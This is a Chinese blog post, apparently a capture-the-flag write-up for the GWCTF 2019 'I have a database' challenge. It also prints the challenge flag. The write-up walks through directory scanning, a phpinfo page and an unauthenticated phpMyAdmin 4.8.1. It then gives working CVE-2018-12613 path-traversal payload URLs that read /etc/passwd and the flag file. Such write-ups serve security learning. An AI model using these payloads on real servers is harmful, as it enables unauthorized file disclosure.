[GWCTF 2019]我有一个数据库

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!


flag{71240f5f-aea6-412e-ab0a-98cec0459bb6}

我们访问题目的链接,发现是个乱码的文字,没有什么发现,我们再右击查看源代码,也还是没有什么发现,那么我们就可以尝试扫目录。

目录扫描发现存在robots.txt文件,我们访问看看

提示一个phpinfo.php文件,我们访问下

是个phpinfo页面,题目开始提示了有个数据库,且这里看到了phpinfo页面,很难不让人猜测phpmyadmin/目录

一访问/phpmyadmin,直接就是可查询页面,都不需要密码登录

phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现

漏洞范围:4.8.0 <= phpMyAdmin < 4.8.2

漏洞复现:phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613

payload:

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

发现可以远程执行命令,那么我们就可以利用这个漏洞查看flag了

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag

相关推荐

最近更新

  1. 前端导出pdf

    2024-03-16 07:02:02       0 阅读
  2. Knife4j的原理及应用详解(五)

    2024-03-16 07:02:02       0 阅读
  3. Day2--每日一练

    2024-03-16 07:02:02       0 阅读
  4. 东方博宜1626 - 暑假的旅游计划

    2024-03-16 07:02:02       0 阅读
  5. react小白面试不得不会的20个问题——第二篇

    2024-03-16 07:02:02       0 阅读
  6. 简单滤波算法伪码

    2024-03-16 07:02:02       0 阅读
  7. Mongodb索引简介

    2024-03-16 07:02:02       0 阅读
  8. Linux 6种日志查看方法

    2024-03-16 07:02:02       0 阅读
  9. 案例研究(Case Study)是什么?怎么写?

    2024-03-16 07:02:02       0 阅读
  10. Linux虚拟化技术:从Xen到KVM

    2024-03-16 07:02:02       0 阅读

热门阅读

  1. 使用VLC实现自动播放视频

    2024-03-16 07:02:02       21 阅读
  2. HTML5、CSS3面试题(三)

    2024-03-16 07:02:02       22 阅读
  3. oracle数据库字符集

    2024-03-16 07:02:02       26 阅读
  4. 关于用文心一言解读Autosar和UDS

    2024-03-16 07:02:02       20 阅读
  5. 主成分分析用于数据降维

    2024-03-16 07:02:02       20 阅读
  6. 【Python】复习3:函数

    2024-03-16 07:02:02       18 阅读
  7. adb shell input text 输入中文

    2024-03-16 07:02:02       23 阅读
  8. Copilot with GPT-4与文心一言4.0:AI技术的未来

    2024-03-16 07:02:02       17 阅读
  9. 系统架构设计师笔记第36期:中间层架构设计

    2024-03-16 07:02:02       22 阅读
  10. AI实景自动直播相比真人直播,都有哪些优势?

    2024-03-16 07:02:02       58 阅读